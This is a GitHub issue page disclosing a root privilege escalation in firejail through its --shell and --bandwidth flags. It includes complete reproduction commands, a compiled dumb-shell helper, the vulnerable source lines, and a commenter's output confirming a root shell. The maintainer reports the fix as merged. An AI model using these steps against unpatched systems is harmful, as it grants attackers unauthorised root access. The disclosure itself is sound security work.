We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
[Against current HEAD, commit 64355]
In a first window run:
$ firejail --noprofile --name=x --net=eth0
In a second window, firstly create a dumb shell that ignores -c:
-c
$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell -
and then secondly invoke that shell via the --shell and --bandwidth flags to obtain root:
--shell
--bandwidth
$ firejail --shell=./dumbshell --bandwidth=x status # id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),125(vboxusers),2000(wiki),10000(martin) context=system_u:system_r:initrc_t:s0
Error occurs at
firejail/src/firejail/bandwidth.c
Lines 445 to 451 in 6435525
char *arg[4]; arg[0] = cfg.shell; arg[1] = "-c"; arg[2] = cmd; arg[3] = NULL; clearenv(); execvp(arg[0], arg);
I don't see any good reason to permit a user-specified shell to run a bandwidth command.
The text was updated successfully, but these errors were encountered:
I can confirm this is "working" in Arch with firejail built from latest source. 😦 $ $ firejail --noprofile --name=x --net=enp6s0
$ $ firejail --noprofile --name=x --net=enp6s0
$ echo 'int main() {system("/bin/sh");}' | gcc -xc -o dumbshell - <stdin>: In function ‘main’: <stdin>:1:13: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration] $ firejail --shell=./dumbshell --bandwidth=x status sh-4.4# id uid=0(root) gid=0(root) groups=0(root),10(wheel),1000(fred) sh-4.4# ls /root Desktop sh-4.4# whoami root sh-4.4# touch /root/bad_dir sh-4.4# ls /root Desktop bad_dir sh-4.4#
EDIT: --noprofile isn't actually needed. $ firejail --name=x --net=enp6s0 works just as well. EDIT:
--noprofile
$ firejail --name=x --net=enp6s0
Sorry, something went wrong.
This one was quite stupid, thanks for finding it!
Fix on mainline: 5d43fdc
Pushed also a fix on 0.9.44-bugfix branch. Interesting, we don't have this on 0.9.38-LTS branch.
No branches or pull requests
[Against current HEAD, commit 64355]
In a first window run:
In a second window, firstly create a dumb shell that ignores
-c
:and then secondly invoke that shell via the
--shell
and--bandwidth
flags to obtain root:Error occurs at
firejail/src/firejail/bandwidth.c
Lines 445 to 451 in 6435525
I don't see any good reason to permit a user-specified shell to run a bandwidth command.
The text was updated successfully, but these errors were encountered: